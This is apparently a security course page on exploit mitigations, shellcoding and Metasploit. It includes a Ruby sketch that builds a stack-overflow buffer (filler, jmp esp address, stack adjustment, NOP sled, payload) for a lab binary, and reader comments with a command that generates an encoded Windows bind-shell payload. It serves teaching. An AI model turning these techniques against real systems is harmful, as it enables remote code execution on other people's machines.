Exploitation 102
Exploit mitigations, shellcoding, and Metasploit with Dino Dai Zovi.
- Slides (start at slide 25)
As mentioned in the video, the homework for this week is to turn your exploit for homework.exe into a Metasploit module. The best Metasploit documentation is online, and it is probably easiest to find a sample exploit and work from there. The Metasploit wikibook has a page on writing Windows exploits that is a good place to start. Keep in mind, though, that the exploit in the wikibook uses the send_cmd function, which comes from the FTP mixin and is FTP specific; for a plain TCP service like homework.exe you will want to use sock.put instead.
For some good examples, look at the following modules included with Metasploit:
- modules/exploits/windows/lpd/niprint.rb
- modules/exploits/windows/proxy/ccproxy_telnet_ping.rb
As a final note, the instructors strongly suggest that you launch your Metasploit exploits from Linux, OSX, or Cygwin on Windows (essentially, anything but the Windows installer).
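The following is an added example, not code from the course or from Metasploit, showing what the exploit method of such a module has to assemble before calling sock.put: filler up to the saved return address, the jmp esp address in little-endian order, a stack adjustment, a short NOP sled, and the payload. The offset, the jmp esp address and the bad-character set are placeholders (assumptions); payload.encoded is stood in for by a few constructed int3 bytes, and the Metasploit socket is replaced by a tiny fake with a put method so the code runs on its own. The stack adjustment is the "add esp, -3500" stub that many real modules set with the Payload 'Prepend' option: a GetPC stub in an encoded payload writes below ESP, and since the payload starts exactly at ESP after jmp esp, it would otherwise overwrite its own bytes.

```ruby
# Added example (not Metasploit's code and not the course's solution):
# a stand-alone sketch of what the exploit method of a Metasploit module for
# homework.exe has to assemble before calling sock.put. The offset, the
# return address and the bad characters are placeholders that must be
# replaced with values measured against the real binary and service.

# Bytes the target must never see in the buffer (assumed: NUL, LF and CR are
# the usual suspects for a line-oriented text protocol).
BAD_CHARS = "\x00\x0a\x0d".b.freeze

# Distance from the first byte sent to the saved return address (assumed).
OFFSET = 69

# Address of a "jmp esp" in a DLL that does not rebase (assumed placeholder).
JMP_ESP = 0x7c836a08

# "add esp, -3500" (81 C4 54 F2 FF FF). After jmp esp the payload starts
# exactly where the stack pointer is; a GetPC stub (FSTENV etc.) in an encoded
# payload writes below ESP and would clobber the payload's own bytes. Moving
# ESP down first gives the decoder its own scratch space. Metasploit modules
# usually get this via 'Payload' => { 'Prepend' => "\x81\xc4\x54\xf2\xff\xff" }.
STACK_ADJUST = [0x81, 0xc4, -3500].pack('CCl<').freeze

# Return the bad bytes present in +bytes+ (an empty array means clean).
def bad_chars_in(bytes, bad = BAD_CHARS)
  bad.bytes & bytes.bytes
end

# Assemble filler + EIP overwrite + stack adjust + NOP sled + payload,
# refusing to build a buffer that would be mangled by the target's parser.
def build_buffer(payload, offset: OFFSET, ret: JMP_ESP, nops: 16)
  ret_bytes = [ret].pack('V')            # little-endian, as it sits in memory
  [ret_bytes, payload].each do |piece|
    found = bad_chars_in(piece)
    unless found.empty?
      raise ArgumentError, 'bad chars present: ' +
                           found.map { |b| format('0x%02x', b) }.join(' ')
    end
  end
  parts = ['A' * offset, ret_bytes, STACK_ADJUST, "\x90" * nops, payload]
  parts.map(&:b).join
end

# Stand-in for the Metasploit socket: a real module gets +sock+ from connect,
# calls sock.put(buf) on it, then handler and disconnect.
class FakeSock
  attr_reader :sent

  def initialize
    @sent = ''.b
  end

  def put(data)
    @sent << data.b
    data.bytesize
  end
end

# The body of a module's exploit method, minus the Msf plumbing.
def exploit(sock, payload)
  buf = build_buffer(payload)
  sock.put(buf)
  buf
end

if __FILE__ == $0
  # Constructed stand-in for payload.encoded: four int3 breakpoints, which
  # let you confirm in the debugger that execution actually reached ESP.
  sock = FakeSock.new
  buf = exploit(sock, "\xcc".b * 4)
  puts "sent #{sock.sent.bytesize} bytes, EIP -> 0x#{buf[OFFSET, 4].unpack1('V').to_s(16)}"
end
```

In the real module the same construction lives inside `def exploit` of a class deriving from `Msf::Exploit::Remote` with the Tcp mixin, `payload.encoded` supplies the encoded shellcode, and `connect`, `sock.put`, `handler` and `disconnect` replace the fake socket. Keep the bad-character check: an encoder such as x86/shikata_ga_nai only avoids the bytes you tell it about, and the return address has to be checked separately because it is never encoded.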
Reading Material
- A collection of win32 shellcode
- Win32 Assembly Components by LSD
- UNIX Assembly Codes Development for Vulnerabilities Illustration Purposes by LSD
- Return-Oriented Programming: Exploits Without Code Injection
- Attacking the Core: Kernel Exploiting Notes
- Offensive Security's Metasploit Unleashed open course
If you passed this section with ease and understand most of the reading material above, you might want to try taking Immunity's Network Offense Professional certification. Good luck!
Reader Comments (11)
Are there any updates for the class? Are more videos coming?
Is the class still being offered? is it online now?
Have you been in contact with other professors who are using your content?
Anything you wanna say about the class?
- When I have time
Taking the class
- In-class this Fall, online next Spring
Professors using material
- I pitched it to a few people at BH. Know at least one person who was able to start a security curriculum because of my talk at SOURCE.
Stuff to say
- Nope! I've said enough already and I think the class material up here speaks for itself. Looking forward to teaching it again.
Thank you very much for the very nice lesson...
I really enjoyed all of this, but the end of the second video seems to be broken at the point where you choose the payload...
so I cannot run a Metasploit payload (I tried, but...).
I had no problem overwriting EIP and finding a "jmp esp" in a library, but then I chose a payload in Metasploit (for example, launching "calc.exe"), put it at the end of the string (so: boom = "A" * 69 + JMP_ESP + PAYLOAD) and demo.exe crashed...
So I tried "A" * 69 + JMP_ESP + INT3 + PAYLOAD and checked in Immunity whether the payload was there: no problem, the whole payload is right after my breakpoint, but if I continue the program it crashes...
I'm sure I'm missing something; I'd be so glad if you could help me.
(I'm running Win2k SP4 in VMware and attacking from BT4 in VMware, all on a Debian Lenny system.)
Thanks again for the great videos.
I (finally) understood my mistake, so I'm posting it here; maybe it will help someone (?)
The problem was that the payload uses the asm instruction FSTENV at the very beginning to find the current address in EIP (I didn't understand how, but I think that is the aim...); this instruction pushes some stuff onto the stack, so the payload code was overwritten with that data.
I had a first solution: we have the start address of the payload in ESP, so I replaced the payload prologue with push esp / pop ebx (or whatever register was used to hold this address), and it gave me a bind_tcp shell but it didn't exit properly...
Then I found the easy and cleaner solution: add some NOP operations before the payload to make room on the stack, and it works!
Nevertheless I still have a little question:
I generate the payloads in msfconsole; even if it's the same payload, it generates something different each time... I think it's something to do with the encoding process... but some of the payloads work and some just crash (before listening on the port, or just after connecting). So my question is just: why?
Thanks for the vids, sorry for my bad English...
Here's a working shellcode.
./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
Why do we jump to ESP?
And how do we know what the address of the shellcode is?
Thanks Dan!